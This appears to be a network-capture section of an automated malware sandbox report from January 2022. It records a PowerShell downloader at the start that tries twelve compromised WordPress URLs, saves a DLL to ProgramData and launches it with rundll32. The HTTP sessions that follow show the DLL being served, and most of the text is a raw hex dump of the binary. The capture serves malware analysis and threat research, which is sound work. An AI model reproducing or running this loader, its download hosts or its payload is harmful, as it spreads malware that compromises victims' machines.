                                                                                                                                  Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://praachichemfood.com/public_html/SWmteCWBUkA89/';$url2 = 'https://dtmconsulting.ca/wp-includes/dkCFwyE/';$url3 = 'https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/';$url4 = 'https://worldaviationhub.com/wp-includes/Lik/';$url5 = 'http://bakultante.com/tee5oeot/Q/';$url6 = 'https://onewaymedia.ro/wp-includes/k/';$url7 = 'https://lodev7.com/wp-content/dpwjiJivrpgO1F2/';$url8 = 'https://trochoi80club.com/wp-content/6shnRU/';$url9 = 'https://haileywells.com/cgi-bin/KJUOaq/';$url10 = 'https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/';$url11 = 'http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/';$url12 = 'https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}
                                                                                                                                  Jan 28, 2022 21:04:46.848866940 CET14INData Raw: 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 27 2c 42
                                                                                                                                  Data Ascii: } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',BBDD;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.2249167103.138.189.12880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 28, 2022 21:04:47.230521917 CET15OUTGET /public_html/SWmteCWBUkA89/ HTTP/1.1
                                                                                                                                  Host: praachichemfood.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 28, 2022 21:04:48.596137047 CET15INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:47 GMT
                                                                                                                                  Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                                                                                                                  X-Powered-By: PHP/7.3.31
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Location: http://www.praachichemfood.com/public_html/SWmteCWBUkA89/
                                                                                                                                  Vary: User-Agent
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Jan 28, 2022 21:04:48.613080025 CET15INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.2249168103.138.189.12880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 28, 2022 21:04:49.322189093 CET16OUTGET /public_html/SWmteCWBUkA89/ HTTP/1.1
                                                                                                                                  Host: www.praachichemfood.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 28, 2022 21:04:50.743541002 CET16INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:49 GMT
                                                                                                                                  Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                                                                                                                  X-Powered-By: PHP/7.3.31
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://www.praachichemfood.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Vary: User-Agent
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 32 0d 0a 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 2
                                                                                                                                  Jan 28, 2022 21:04:50.743566990 CET17INData Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a
                                                                                                                                  Data Ascii: 17<!DOCTYPE html><html
                                                                                                                                  Jan 28, 2022 21:04:50.743750095 CET17INData Raw: 31 30 36 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 75 74 2d 6e 6f 2d 6a 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23
                                                                                                                                  Data Ascii: 106lang="en-US" class="ut-no-js">...##########################################################################################BROOKLYN THEME BY UNITED THEMESDESIGNED BY MARCEL MOERKENSDEVELOPED BY MARCEL MOERKENS & MATTHIAS
                                                                                                                                  Jan 28, 2022 21:04:50.744501114 CET17INData Raw: 38 36 0d 0a 34 2e 39 2e 37 2e 32 72 0d 0a 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23
                                                                                                                                  Data Ascii: 864.9.7.2r##########################################################################################--><head> <meta charset="
                                                                                                                                  Jan 28, 2022 21:04:50.745362997 CET17INData Raw: 38 35 0d 0a 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d
                                                                                                                                  Data Ascii: 85UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
                                                                                                                                  Jan 28, 2022 21:04:50.746299982 CET18INData Raw: 33 34 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 0d 0a
                                                                                                                                  Data Ascii: 34 <meta name="description" content="
                                                                                                                                  Jan 28, 2022 21:04:50.746504068 CET18INData Raw: 35 64 0d 0a 70 72 61 61 63 68 69 63 68 65 6d 66 6f 6f 64 2e 63 6f 6d 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 53 53 20 26 20 50 69 6e 67 62 61 63 6b 73 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70
                                                                                                                                  Data Ascii: 5dpraachichemfood.com"> ... RSS & Pingbacks --><link rel="pingback" href="
                                                                                                                                  Jan 28, 2022 21:04:50.746525049 CET18INData Raw: 38 35 0d 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 61 61 63 68 69 63 68 65 6d 66 6f 6f 64 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68
                                                                                                                                  Data Ascii: 85http://www.praachichemfood.com/xmlrpc.php" /> <link rel="profile" href="https://gmpg.org/xfn/11"> ... Favicon -->
                                                                                                                                  Jan 28, 2022 21:04:50.747564077 CET18INData Raw: 31 32 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 0d 0a
                                                                                                                                  Data Ascii: 12
                                                                                                                                  Jan 28, 2022 21:04:50.747831106 CET19INData Raw: 31 35 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 26 23 78 32 30 3b 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 72 61 61 63 68 69
                                                                                                                                  Data Ascii: 156 <link rel="shortcut&#x20;icon" href="http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png" type="image/png" /> <link rel="icon" href="http://praachichemfood.com/wp-content/them
                                                                                                                                  Jan 28, 2022 21:04:51.049526930 CET20INData Raw: 32 37 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 0d 0a 35 64 0d 0a 68 74 74 70 3a 2f 2f 70 72 61 61 63 68 69 63 68 65 6d 66 6f 6f 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e
                                                                                                                                  Data Ascii: 27 <link rel="apple-touch-icon" href="5dhttp://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png"> 35 <link rel="apple-touch-icon" sizes="72x72" href="5fhttp://praachichemfood.com/wp-conten


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.2249169162.241.211.118443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-28 20:04:53 UTC0OUTGET /wp-includes/dkCFwyE/ HTTP/1.1
                                                                                                                                  Host: dtmconsulting.ca
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2022-01-28 20:04:53 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Server: Apache/2.4.52 (cPanel) OpenSSL/1.1.1m mod_bwlimited/1.4
                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Content-Disposition: attachment; filename="e21HfoMWQuR1.dll"
                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                  Set-Cookie: 61f44c65b4443=1643400293; expires=Fri, 28-Jan-2022 20:05:53 GMT; Max-Age=60; path=/
                                                                                                                                  Last-Modified: Fri, 28 Jan 2022 20:04:53 GMT
                                                                                                                                  Content-Length: 548864
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-01-28 20:04:53 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a
                                                                                                                                  2022-01-28 20:04:53 UTC8INData Raw: 44 8b 45 dc 89 45 e8 8b 4d d8 89 4d ec 8b 55 e0 89 55 f0 8b 45 e4 8b 48 24 89 4d f4 e9 1c ff ff ff c7 45 f8 01 00 00 00 8d 55 e8 52 8b 45 08 50 8b 4d d4 e8 68 fd ff ff 85 c0 75 04 33 c0 eb 05 b8 01 00 00 00 8b e5 5d c2 04 00 cc cc cc cc cc 55 8b ec 83 ec 14 89 4d ec 8b 45 08 8b 48 04 89 4d f0 8b 55 08 8b 02 05 c0 00 00 00 89 45 f8 8b 4d f8 83 39 00 75 07 b8 01 00 00 00 eb 41 8b 55 f8 8b 45 f0 03 02 89 45 fc 8b 4d fc 8b 51 0c 89 55 f4 83 7d f4 00 74 22 8b 45 f4 83 38 00 74 1a 6a 00 6a 01 8b 4d f0 51 8b 55 f4 8b 02 ff d0 8b 4d f4 83 c1 04 89 4d f4 eb de b8 01 00 00 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 2c 89 4d d8 8b 45 08 8b 48 04 89 4d f4 8b 55 08 8b 02 05 a0 00 00 00 89 45 f8 8b 4d f8 83 79 04 00 75 0e 33 c0 83 7d 0c 00 0f
                                                                                                                                  Data Ascii: DEEMMUUEH$MEUREPMhu3]UMEHMUEM9uAUEEMQU}t"E8tjjMQUMM]U,MEHMUEMyu3}
                                                                                                                                  2022-01-28 20:04:54 UTC15INData Raw: 10 2b ca 2b 0d c8 30 05 10 2b 0d bc 30 05 10 2b 0d c0 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 c0 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 0f af 15 bc 30 05 10 03 ca 8b 15 c0 30 05 10 0f af 15 c0 30 05 10 2b ca 2b 0d c0 30 05 10 2b 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d b8 30 05 10 2b 0d c0 30 05 10 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d bc 30 05 10 2b 0d c0 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 c0 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 8b 15 c8 30 05
                                                                                                                                  Data Ascii: ++0+0+000++000++000+00000++0+0+0+0+00000++0+0+000++000++000+0
                                                                                                                                  2022-01-28 20:04:54 UTC23INData Raw: 8b 45 08 2b 05 bc 30 05 10 03 05 c8 30 05 10 2b 05 c4 30 05 10 8b 0d c8 30 05 10 0f af 0d bc 30 05 10 03 c1 8b 15 c0 30 05 10 0f af 15 bc 30 05 10 0f af 15 c0 30 05 10 03 c2 2b 05 c4 30 05 10 8b 0d c4 30 05 10 0f af 0d bc 30 05 10 03 05 bc 30 05 10 03 c8 8b 15 bc 30 05 10 0f af 15 c0 30 05 10 03 ca a1 b8 30 05 10 0f af 05 c4 30 05 10 0f af 05 c0 30 05 10 2b c8 2b 0d bc 30 05 10 8b 15 c4 30 05 10 0f af 15 c8 30 05 10 2b ca 03 0d c4 30 05 10 2b 0d c0 30 05 10 a1 c0 30 05 10 0f af 05 c0 30 05 10 2b c8 8b 15 b8 30 05 10 0f af 15 c0 30 05 10 0f af 15 c0 30 05 10 03 ca 2b 0d bc 30 05 10 2b 0d bc 30 05 10 03 0d c8 30 05 10 2b 0d c4 30 05 10 a1 c8 30 05 10 0f af 05 bc 30 05 10 03 c8 8b 15 c0 30 05 10 0f af 15 bc 30 05 10 0f af 15 c0 30 05 10 03 ca 2b 0d c4 30 05
                                                                                                                                  Data Ascii: E+00+000000+000000000++000+0+000+000+0+00+000000+0
                                                                                                                                  2022-01-28 20:04:54 UTC31INData Raw: af 45 f0 03 c8 2b 4d e4 2b 4d dc 8b 55 e4 0f af 55 f0 03 ca 8b 45 f4 0f af 45 f0 99 f7 7d f0 2b c8 2b 4d dc 2b 4d dc 2b 4d f4 03 4d e0 8b 45 f0 0f af 45 f0 0f af 45 dc 0f af 45 e0 0f af 45 f0 0f af 45 dc 99 f7 7d f0 2b c8 2b 4d dc 2b 4d f4 03 4d e4 03 4d f0 89 4d e8 8b 4d e8 8b 45 dc 99 f7 7d f0 99 f7 7d f0 0f af 45 f4 99 f7 7d f0 0f af 45 dc 99 f7 7d f4 03 c8 8b 75 dc 0f af 75 f0 03 4d e0 03 f1 8b 45 dc 99 f7 7d f0 99 f7 7d f0 0f af 45 f4 99 f7 7d f0 0f af 45 dc 99 f7 7d f4 03 f0 8b 4d dc 0f af 4d f0 03 75 e0 03 ce 8b 45 dc 99 f7 7d f0 99 f7 7d f0 0f af 45 f4 99 f7 7d f0 0f af 45 dc 99 f7 7d f4 03 c8 8b 75 dc 0f af 75 f0 03 4d e0 03 f1 8b 45 dc 99 f7 7d f0 99 f7 7d f0 0f af 45 f4 99 f7 7d f0 0f af 45 dc 99 f7 7d f4 03 f0 8b 55 dc 0f af 55 f0 03 75 e0 03
                                                                                                                                  Data Ascii: E+M+MUUEE}++M+M+MMEEEEEE}++M+MMMMME}}E}E}uuME}}E}E}MMuE}}E}E}uuME}}E}E}UUu
                                                                                                                                  2022-01-28 20:04:54 UTC39INData Raw: f0 03 75 e4 2b 75 e0 8b 4d e4 0f af 4d f4 03 f1 8b 55 e0 0f af 55 f4 2b f2 8b 4d e4 0f af 4d e4 0f af 4d dc 03 75 dc 03 ce 8b 45 e0 99 f7 7d f0 0f af 45 e0 2b c8 03 4d e4 8b 55 f0 0f af 55 f0 2b ca 03 4d e4 2b 4d e0 8b 45 e4 0f af 45 f4 03 c8 8b 55 e0 0f af 55 f4 2b ca 8b 75 e4 0f af 75 e4 0f af 75 dc 03 4d dc 03 f1 8b 45 e0 99 f7 7d f0 0f af 45 e0 2b f0 03 75 e4 8b 45 f0 0f af 45 f0 2b f0 03 75 e4 2b 75 e0 8b 4d e4 0f af 4d f4 03 f1 8b 55 e0 0f af 55 f4 2b f2 8b 4d e4 0f af 4d e4 0f af 4d dc 03 75 dc 03 ce 8b 45 e0 99 f7 7d f0 0f af 45 e0 2b c8 03 4d e4 8b 55 f0 0f af 55 f0 2b ca 03 4d e4 2b 4d e0 8b 45 e4 0f af 45 f4 03 c8 8b 55 e0 0f af 55 f4 2b ca 8b 75 e4 0f af 75 e4 0f af 75 dc 03 4d dc 03 f1 8b 45 e0 99 f7 7d f0 0f af 45 e0 2b f0 03 75 e4 8b 45 f0
                                                                                                                                  Data Ascii: u+uMMUU+MMMuE}E+MUU+M+MEEUU+uuuME}E+uEE+u+uMMUU+MMMuE}E+MUU+M+MEEUU+uuuME}E+uE
                                                                                                                                  2022-01-28 20:04:54 UTC47INData Raw: f4 03 4d e0 2b 4d f4 8b 45 f0 0f af 45 f4 2b c8 03 4d dc 8b 45 e0 99 f7 7d f4 2b c8 2b 4d f0 8b 75 f0 0f af 75 f0 03 4d e0 03 f1 8b 45 e0 99 f7 7d e4 2b f0 8b 4d f4 0f af 4d dc 2b f1 2b 75 f4 03 75 e0 2b 75 f4 8b 55 f0 0f af 55 f4 2b f2 03 75 dc 8b 45 e0 99 f7 7d f4 2b f0 2b 75 f0 8b 4d f0 0f af 4d f0 03 75 e0 03 ce 8b 45 e0 99 f7 7d e4 2b c8 8b 55 f4 0f af 55 dc 2b ca 2b 4d f4 03 4d e0 2b 4d f4 8b 45 f0 0f af 45 f4 2b c8 03 4d dc 8b 45 e0 99 f7 7d f4 2b c8 2b 4d f0 8b 75 f0 0f af 75 f0 03 4d e0 03 f1 8b 45 e0 99 f7 7d e4 2b f0 8b 4d f4 0f af 4d dc 2b f1 2b 75 f4 03 75 e0 2b 75 f4 8b 55 f0 0f af 55 f4 2b f2 03 75 dc 8b 45 e0 99 f7 7d f4 2b f0 2b 75 f0 8b 4d f0 0f af 4d f0 03 75 e0 03 ce 8b 45 e0 99 f7 7d e4 2b c8 8b 55 f4 0f af 55 dc 2b ca 2b 4d f4 03 4d
                                                                                                                                  Data Ascii: M+MEE+ME}++MuuME}+MM++uu+uUU+uE}++uMMuE}+UU++MM+MEE+ME}++MuuME}+MM++uu+uUU+uE}++uMMuE}+UU++MM
                                                                                                                                  2022-01-28 20:04:54 UTC55INData Raw: f0 2b f0 03 75 e0 03 75 e0 8b 45 e4 99 f7 7d f0 99 f7 7d f0 03 f0 8b 45 e4 0f af 45 f0 99 f7 7d e4 8b c8 0f af 4d f4 03 75 dc 03 ce 2b 4d e4 03 4d dc 2b 4d e4 8b 45 dc 99 f7 7d f0 99 f7 7d f0 2b c8 03 4d e0 03 4d e0 8b 45 e4 99 f7 7d f0 99 f7 7d f0 03 c8 8b 45 e4 0f af 45 f0 99 f7 7d e4 8b f0 0f af 75 f4 03 4d dc 03 f1 2b 75 e4 03 75 dc 2b 75 e4 8b 45 dc 99 f7 7d f0 99 f7 7d f0 2b f0 03 75 e0 03 75 e0 8b 45 e4 99 f7 7d f0 99 f7 7d f0 03 f0 8b 45 e4 0f af 45 f0 99 f7 7d e4 8b c8 0f af 4d f4 03 75 dc 03 ce 2b 4d e4 03 4d dc 2b 4d e4 8b 45 dc 99 f7 7d f0 99 f7 7d f0 2b c8 03 4d e0 03 4d e0 8b 45 e4 99 f7 7d f0 99 f7 7d f0 03 c8 8b 45 e4 0f af 45 f0 99 f7 7d e4 8b f0 0f af 75 f4 03 4d dc 03 f1 2b 75 e4 03 75 dc 2b 75 e4 8b 45 dc 99 f7 7d f0 99 f7 7d f0 2b f0
                                                                                                                                  Data Ascii: +uuE}}EE}Mu+MM+ME}}+MME}}EE}uM+uu+uE}}+uuE}}EE}Mu+MM+ME}}+MME}}EE}uM+uu+uE}}+
                                                                                                                                  2022-01-28 20:04:54 UTC62INData Raw: 7d e4 03 c8 8b 45 e0 0f af 45 e4 0f af 45 dc 03 c8 8b 75 dc 0f af 75 dc 0f af 75 e0 0f af 75 f4 0f af 75 f4 03 4d dc 03 f1 8b 4d e0 0f af 4d e0 2b f1 2b 75 dc 8b 55 e0 0f af 55 e4 03 f2 8b 45 e0 0f af 45 f0 2b f0 03 75 f4 8b 45 e4 99 f7 7d e4 03 f0 8b 4d e0 0f af 4d e4 0f af 4d dc 03 f1 8b 55 dc 0f af 55 dc 0f af 55 e0 0f af 55 f4 0f af 55 f4 03 75 dc 03 d6 8b 45 e0 0f af 45 e0 2b d0 2b 55 dc 03 55 e0 89 55 e8 8b 4d e8 0f af 4d e4 03 4d f0 8b 45 e4 99 f7 7d f0 0f af 45 e4 2b c8 8b 45 f4 0f af 45 e4 99 f7 7d f4 2b c8 03 4d e0 8b 45 f4 99 f7 7d e4 99 f7 7d f0 0f af 45 e0 2b c8 8b 55 e0 0f af 55 f4 0f af 55 f0 0f af 55 f4 2b ca 2b 4d e4 03 4d e0 8b 45 e0 0f af 45 e0 0f af 45 e4 0f af 45 e4 2b c8 2b 4d f0 8b 55 f4 0f af 55 e4 2b ca 03 4d f0 8b 45 e4 99 f7 7d
                                                                                                                                  Data Ascii: }EEEuuuuuMMM++uUUEE+uE}MMMUUUUUuEE++UUUMMME}E+EE}+ME}}E+UUUU++MMEEEE++MUU+ME}
                                                                                                                                  2022-01-28 20:04:54 UTC70INData Raw: f0 03 c8 2b 4d f4 2b 4d e0 8b 55 dc 0f af 55 dc 2b ca 2b 4d e0 8b 45 dc 99 f7 7d e4 2b c8 2b 4d dc 8b 45 e4 0f af 45 dc 03 c8 2b 4d f4 03 4d f0 8b 45 e0 99 f7 7d e4 03 c8 8b 45 f4 0f af 45 e0 99 f7 7d f0 03 c8 2b 4d f4 2b 4d e0 8b 55 dc 0f af 55 dc 2b ca 2b 4d e0 8b 45 dc 99 f7 7d e4 2b c8 2b 4d dc 8b 45 e4 0f af 45 dc 03 c8 2b 4d f4 03 4d f0 8b 45 e0 99 f7 7d e4 03 c8 8b 45 f4 0f af 45 e0 99 f7 7d f0 03 c8 2b 4d f4 2b 4d e0 8b 55 dc 0f af 55 dc 2b ca 2b 4d e0 8b 45 dc 99 f7 7d e4 2b c8 2b 4d dc 8b 45 e4 0f af 45 dc 03 c8 2b 4d f4 03 4d f0 8b 45 e0 99 f7 7d e4 03 4d f4 03 c1 89 45 e8 8b 4d e8 03 4d dc 8b 45 e0 99 f7 7d f0 8b f0 03 4d f0 03 f1 8b 45 dc 99 f7 7d e4 99 f7 7d f0 0f af 45 dc 2b f0 8b 55 f4 0f af 55 e0 2b f2 2b 75 dc 03 75 e0 2b 75 dc 03 75 f4
                                                                                                                                  Data Ascii: +M+MUU++ME}++MEE+MME}EE}+M+MUU++ME}++MEE+MME}EE}+M+MUU++ME}++MEE+MME}MEMME}ME}}E+UU++uu+uu
                                                                                                                                  2022-01-28 20:04:54 UTC78INData Raw: 0c 5d c3 cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 6f 66 00 00 8b 45 fc c7 00 6c 6e 04 10 8b 45 fc 8b e5 5d c3 cc 55 8b ec 51 89 4d fc 8b 4d fc e8 43 4f 00 00 8b 45 08 83 e0 01 74 09 8b 4d fc 51 e8 30 db fe ff 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 6a 00 6a 00 6a 00 6a 00 8b 45 0c 50 8b 4d 08 51 6a 01 8b 4d fc e8 bf 4f 00 00 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 6a 00 6a 00 68 09 10 00 00 8b 45 fc 8b 48 20 51 ff 15 30 64 04 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 0c 50 8b 4d 08 51 68 14 10 00 00 8b 55 fc 8b 42 20 50 ff 15 30 64 04 10 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 0c 25 ff ff 00 00 0f b7 c8 51 8b 55 08 52 68 1e
                                                                                                                                  Data Ascii: ]UQMMofElnE]UQMMCOEtMQ0E]UQMjjjjEPMQjMO]UQMjjhEH Q0d]UQMEPMQhUB P0d]UQME%QURh
                                                                                                                                  2022-01-28 20:04:54 UTC86INData Raw: b4 64 04 10 8b 4e 08 25 fb f6 ff ff 3b 4e 20 73 ce 53 ff 76 04 0b c7 50 51 8b 4e 0c e8 2c fe ff ff eb 10 8b 76 14 85 f6 74 b5 53 ff 76 20 e8 c0 ac 00 00 5f 5e 5b c2 04 00 55 8d 6c 24 88 81 ec 94 00 00 00 a1 cc 45 05 10 33 c5 89 45 74 53 56 57 ff 15 c8 64 04 10 0f bf d8 c1 e8 10 83 fb 04 0f bf c8 89 4d e8 7e 05 83 f9 05 7f 05 e9 95 aa 00 00 83 fb 20 7e 03 6a 20 5b 8d 43 fc 99 2b c2 8d 73 0f c1 fe 04 8b f8 d1 ff 8b c6 c1 e0 04 03 f8 2b fb 83 ff 0c 7e 03 6a 0c 5f 6a 20 58 3b c8 7e 03 89 45 e8 68 80 00 00 00 8d 45 f4 68 ff 00 00 00 50 e8 8e a8 01 00 8b 45 e8 83 c0 fa d1 f8 83 c4 0c 0f af c6 8d 0c 36 8d 44 45 f4 ba fc 73 04 10 89 4d ec c7 45 f0 05 00 00 00 66 0f b6 32 8b cf 66 d3 e6 42 66 f7 d6 0f b7 ce 88 28 88 48 01 03 45 ec ff 4d f0 75 e3 8d 45 f4 50 6a 01
                                                                                                                                  Data Ascii: dN%;N sSvPQN,vtSv _^[Ul$E3EtSVWdM~ ~j [C+s+~j_j X;~EhEhPE6DEsMEf2fBf(HEMuEPj
                                                                                                                                  2022-01-28 20:04:54 UTC93INData Raw: 74 24 10 8b ce 6a 00 ff 74 24 14 50 e8 b6 ff ff ff 5e c2 0c 00 6a 00 ff 74 24 10 ff 74 24 10 ff 74 24 10 e8 9f ff ff ff c2 0c 00 53 8b 5c 24 08 f7 c3 00 00 ff ff 56 57 8b f9 89 5f 58 75 0c 83 7f 54 00 75 06 0f b7 c3 89 47 54 e8 42 84 00 00 8b 70 0c 6a 05 53 56 ff 15 84 62 04 10 50 56 ff 15 8c 62 04 10 56 ff 74 24 18 8b d8 53 8b cf e8 7e ff ff ff 53 8b f0 ff 15 0c 62 04 10 5f 8b c6 5e 5b c2 08 00 6a 00 ff 74 24 0c ff 74 24 0c e8 5e ff ff ff c2 08 00 56 8b f1 ff 76 54 e8 5d 84 01 00 ff 74 24 0c e8 aa 9c 01 00 ff 76 68 89 46 54 e8 49 84 01 00 ff 76 50 e8 97 9c 01 00 83 c4 10 89 46 68 5e c2 04 00 55 8b ec 83 ec 14 53 56 57 8d 45 fc 50 33 ff be 1f 00 02 00 56 57 68 78 77 04 10 8b d9 68 01 00 00 80 89 5d ec 89 7d f4 89 7d fc 89 7d f8 ff 15 1c 60 04 10 85 c0 75
